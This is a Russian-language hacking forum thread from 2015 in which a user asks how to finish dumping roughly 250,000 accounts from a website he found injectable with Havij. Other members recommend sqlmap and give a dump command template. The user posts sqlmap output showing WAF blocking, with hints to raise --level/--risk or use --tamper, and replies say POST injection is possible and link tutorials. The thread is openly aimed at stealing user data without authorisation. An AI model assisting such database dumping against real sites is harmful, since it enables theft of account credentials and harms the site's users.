ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Слив базы с сайта (https://forum.antichat.xyz/showthread.php?t=428303)

maluw3250 29.07.2015 02:09

С помощью Havij нашел сайт с базой примерно в чверть лимона акаунтов. Но при сливе где-то 60к сливаю и програма виснет! Есть альтернатива для быстрого слива аккаунтов?

ghost8 29.07.2015 04:44

sqlmap

maluw3250 29.07.2015 22:25

Цитата:

Сообщение от ghost8

sqlmap

Прога не читает базу с етого сайта (

beginner2010 29.07.2015 22:32

Может параметры для sqlmap неправильно указаны?

maluw3250 29.07.2015 22:40

я не продвинутий юзер в таких программах, можно подсказать что и где можно настроить?

Br@!ns 29.07.2015 22:57

Цитата:

Сообщение от maluw3250

я не продвинутий юзер в таких программах, можно подсказать что и где можно настроить?

мануалы читайте, в интернете их полно. Или линк скидывайте

maluw3250 29.07.2015 23:01

Цитата:

Сообщение от Br@!ns

мануалы читайте, в интернете их полно. Или линк скидывайте

пока пробую сам разобраться. А линк неа. Базу сольют за секунды!

maluw3250 29.07.2015 23:09

пока проблема в том, что етот сайт не доступен! и поетому я и не могу проверить работу программ!

Ch3ck 29.07.2015 23:18

Код:

sqlmap.py -u "хттп://имя сайта" -D имя базы -T имя таблицы -C столбцы --dump

maluw3250 29.07.2015 23:24

Цитата:

Сообщение от Ch3ck

Код:

sqlmap.py -u "хттп://имя сайта" -D имя базы -T имя таблицы -C столбцы --dump

вопрос о "имя базы"

Если их 2-3 брать первую?

beginner2010 29.07.2015 23:30

Из какой базы данные тянуть собираетесь, ту и нужно писать

maluw3250 31.07.2015 08:52

Если я правильно понимаю то sqlmap делает инекцию только по параметру GET?

Код:

[07:48:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[07:48:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[07:49:21] [WARNING] GET parameter 'id' is not injectable
[07:49:21] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[07:49:21] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 224 times
[*] shutting down at 07:49:21


frank 31.07.2015 09:50

Цитата:

Сообщение от maluw3250

Если я правильно понимаю то sqlmap делает инекцию только по параметру GET?
Код:

[07:48:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[07:48:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[07:49:21] [WARNING] GET parameter 'id' is not injectable
[07:49:21] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[07:49:21] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 224 times
[*] shutting down at 07:49:21


нет, вы заблуждаетесь, POST он тоже умеет

как вариант хотя бы вот эту мааааленькую статейку посмотрите

Код:

http://blog.tunnelshade.in/2013/03/post-data-sql-injection-using-sqlmap.html

faza02 31.07.2015 09:51

Цитата:

Сообщение от maluw3250

Если я правильно понимаю то sqlmap делает инекцию только по параметру GET?
Код:

[07:48:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[07:48:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[07:49:21] [WARNING] GET parameter 'id' is not injectable
[07:49:21] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[07:49:21] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 224 times
[*] shutting down at 07:49:21


нет. https://github.com/sqlmapproject/sqlmap/wiki/Usage


Время: 17:11